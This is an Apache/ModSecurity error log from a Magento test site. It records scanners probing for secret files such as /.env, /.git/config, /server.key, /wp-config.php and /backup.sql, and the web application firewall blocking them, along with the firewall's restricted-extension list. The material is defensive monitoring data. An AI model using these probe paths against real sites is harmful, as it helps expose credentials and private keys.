[Wed Nov 06 23:04:46.820943 2024] [:error] [pid 3138294] [client 31.188.188.1:56045] [client 31.188.188.1] ModSecurity: Rule 7fc360c07be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/customer/account/loginPost/referer/aHR0cHM6Ly9lY29ub21pYXNvbGlkYWxlLnRlc3QuaW5kYWNvdHJlbnRpbm8uY29tL3N1Y2NvLWRpLW1lbGEtYmlvLWJhZy1pbi1ib3gtMy1sLWF6aWVuZGEtYWdyaWNvbGEtYmlvLW1hc28tZ2lhcmUtbWFzby1naWFyZS5odG1s/"] [unique_id "Zyvn_t54IuxSIOuvq6jL2wAAAAE"], referer: https://economiasolidale.test.indacotrentino.com/customer/account/login/referer/aHR0cHM6Ly9lY29ub21pYXNvbGlkYWxlLnRlc3QuaW5kYWNvdHJlbnRpbm8uY29tL3N1Y2NvLWRpLW1lbGEtYmlvLWJhZy1pbi1ib3gtMy1sLWF6aWVuZGEtYWdyaWNvbGEtYmlvLW1hc28tZ2lhcmUtbWFzby1naWFyZS5odG1s/
[Wed Nov 06 23:04:46.823597 2024] [:error] [pid 3138294] [client 31.188.188.1:56045] [client 31.188.188.1] ModSecurity: Rule 7fc360c07be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/customer/account/loginPost/referer/aHR0cHM6Ly9lY29ub21pYXNvbGlkYWxlLnRlc3QuaW5kYWNvdHJlbnRpbm8uY29tL3N1Y2NvLWRpLW1lbGEtYmlvLWJhZy1pbi1ib3gtMy1sLWF6aWVuZGEtYWdyaWNvbGEtYmlvLW1hc28tZ2lhcmUtbWFzby1naWFyZS5odG1s/"] [unique_id "Zyvn_t54IuxSIOuvq6jL2wAAAAE"], referer: https://economiasolidale.test.indacotrentino.com/customer/account/login/referer/aHR0cHM6Ly9lY29ub21pYXNvbGlkYWxlLnRlc3QuaW5kYWNvdHJlbnRpbm8uY29tL3N1Y2NvLWRpLW1lbGEtYmlvLWJhZy1pbi1ib3gtMy1sLWF6aWVuZGEtYWdyaWNvbGEtYmlvLW1hc28tZ2lhcmUtbWFzby1naWFyZS5odG1s/
[Fri Nov 15 17:57:05.859546 2024] [authz_core:error] [pid 3339705] [client 46.101.111.185:57416] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 15 17:57:06.768026 2024] [:error] [pid 3339735] [client 46.101.111.185:57448] [client 46.101.111.185] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Zzd9YsIgiDS8EjRMNrDxxgAAAAI"]
[Fri Nov 15 17:57:06.768417 2024] [:error] [pid 3339735] [client 46.101.111.185:57448] [client 46.101.111.185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Zzd9YsIgiDS8EjRMNrDxxgAAAAI"]
[Fri Nov 15 17:57:06.768677 2024] [:error] [pid 3339735] [client 46.101.111.185:57448] [client 46.101.111.185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Zzd9YsIgiDS8EjRMNrDxxgAAAAI"]
[Fri Nov 15 17:57:06.834303 2024] [:error] [pid 3339725] [client 46.101.111.185:57450] [client 46.101.111.185] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zzd9Yp5NBH7zffHJ4Sth0gAAAAU"]
[Fri Nov 15 17:57:06.834618 2024] [:error] [pid 3339725] [client 46.101.111.185:57450] [client 46.101.111.185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zzd9Yp5NBH7zffHJ4Sth0gAAAAU"]
[Fri Nov 15 17:57:06.834841 2024] [:error] [pid 3339725] [client 46.101.111.185:57450] [client 46.101.111.185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zzd9Yp5NBH7zffHJ4Sth0gAAAAU"]
[Fri Nov 15 17:57:06.900133 2024] [:error] [pid 3339735] [client 46.101.111.185:57462] [client 46.101.111.185] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zzd9YsIgiDS8EjRMNrDxxwAAAAI"]
[Fri Nov 15 17:57:06.900635 2024] [:error] [pid 3339735] [client 46.101.111.185:57462] [client 46.101.111.185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zzd9YsIgiDS8EjRMNrDxxwAAAAI"]
[Fri Nov 15 17:57:06.901037 2024] [:error] [pid 3339735] [client 46.101.111.185:57462] [client 46.101.111.185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zzd9YsIgiDS8EjRMNrDxxwAAAAI"]
[Sat Nov 16 10:50:38.186278 2024] [:error] [pid 3351088] [client 45.148.10.172:8906] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zzhq7ij-ULhZUgML6xwgEQAAAAE"]
[Sat Nov 16 10:50:38.186999 2024] [:error] [pid 3351088] [client 45.148.10.172:8906] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zzhq7ij-ULhZUgML6xwgEQAAAAE"]
[Sat Nov 16 10:50:38.187514 2024] [:error] [pid 3351088] [client 45.148.10.172:8906] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zzhq7ij-ULhZUgML6xwgEQAAAAE"]
[Sat Nov 16 16:25:46.655209 2024] [:error] [pid 3351051] [client 213.232.87.228:56143] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Zzi5eoT2zXNLOzKcYQkTFwAAAAk"]
[Sat Nov 16 16:25:46.662427 2024] [:error] [pid 3351051] [client 213.232.87.228:56143] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Zzi5eoT2zXNLOzKcYQkTFwAAAAk"]
[Sat Nov 16 16:25:46.662650 2024] [:error] [pid 3351051] [client 213.232.87.228:56143] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Zzi5eoT2zXNLOzKcYQkTFwAAAAk"]
[Sat Nov 16 16:25:46.662846 2024] [:error] [pid 3351051] [client 213.232.87.228:56143] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Zzi5eoT2zXNLOzKcYQkTFwAAAAk"]
[Sat Nov 16 16:25:46.714996 2024] [:error] [pid 3348245] [client 213.232.87.228:36569] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Zzi5epIzK9E2HEz6OXJ03AAAAAY"]
[Sat Nov 16 16:25:46.715259 2024] [:error] [pid 3348245] [client 213.232.87.228:36569] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Zzi5epIzK9E2HEz6OXJ03AAAAAY"]
[Sat Nov 16 16:25:46.715439 2024] [:error] [pid 3348245] [client 213.232.87.228:36569] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Zzi5epIzK9E2HEz6OXJ03AAAAAY"]
[Sat Nov 16 16:25:46.716602 2024] [:error] [pid 3351054] [client 213.232.87.228:32583] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Zzi5eit_m10x-znEZRjaNgAAAAw"]
[Sat Nov 16 16:25:46.716841 2024] [:error] [pid 3351054] [client 213.232.87.228:32583] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Zzi5eit_m10x-znEZRjaNgAAAAw"]
[Sat Nov 16 16:25:46.716991 2024] [:error] [pid 3351054] [client 213.232.87.228:32583] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Zzi5eit_m10x-znEZRjaNgAAAAw"]
[Sat Nov 16 16:25:46.783364 2024] [:error] [pid 3351051] [client 213.232.87.228:27329] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Zzi5eoT2zXNLOzKcYQkTGAAAAAk"]
[Sat Nov 16 16:25:46.783586 2024] [:error] [pid 3351051] [client 213.232.87.228:27329] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Zzi5eoT2zXNLOzKcYQkTGAAAAAk"]
[Sat Nov 16 16:25:46.783766 2024] [:error] [pid 3351051] [client 213.232.87.228:27329] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Zzi5eoT2zXNLOzKcYQkTGAAAAAk"]
[Sat Nov 16 16:25:46.863742 2024] [:error] [pid 3348245] [client 213.232.87.228:3613] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Zzi5epIzK9E2HEz6OXJ03QAAAAY"]
[Sat Nov 16 16:25:46.863877 2024] [:error] [pid 3348245] [client 213.232.87.228:3613] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Zzi5epIzK9E2HEz6OXJ03QAAAAY"]
[Sat Nov 16 16:25:46.864068 2024] [:error] [pid 3348245] [client 213.232.87.228:3613] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Zzi5epIzK9E2HEz6OXJ03QAAAAY"]
[Sat Nov 16 16:25:46.864224 2024] [:error] [pid 3348245] [client 213.232.87.228:3613] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Zzi5epIzK9E2HEz6OXJ03QAAAAY"]
[Sat Nov 16 16:25:46.923928 2024] [:error] [pid 3351051] [client 213.232.87.228:4301] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Zzi5eoT2zXNLOzKcYQkTGQAAAAk"]
[Sat Nov 16 16:25:46.924546 2024] [:error] [pid 3351051] [client 213.232.87.228:4301] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Zzi5eoT2zXNLOzKcYQkTGQAAAAk"]
[Sat Nov 16 16:25:46.924883 2024] [:error] [pid 3351051] [client 213.232.87.228:4301] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Zzi5eoT2zXNLOzKcYQkTGQAAAAk"]
[Sat Nov 16 16:25:46.970500 2024] [authz_core:error] [pid 3351088] [client 213.232.87.228:52503] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
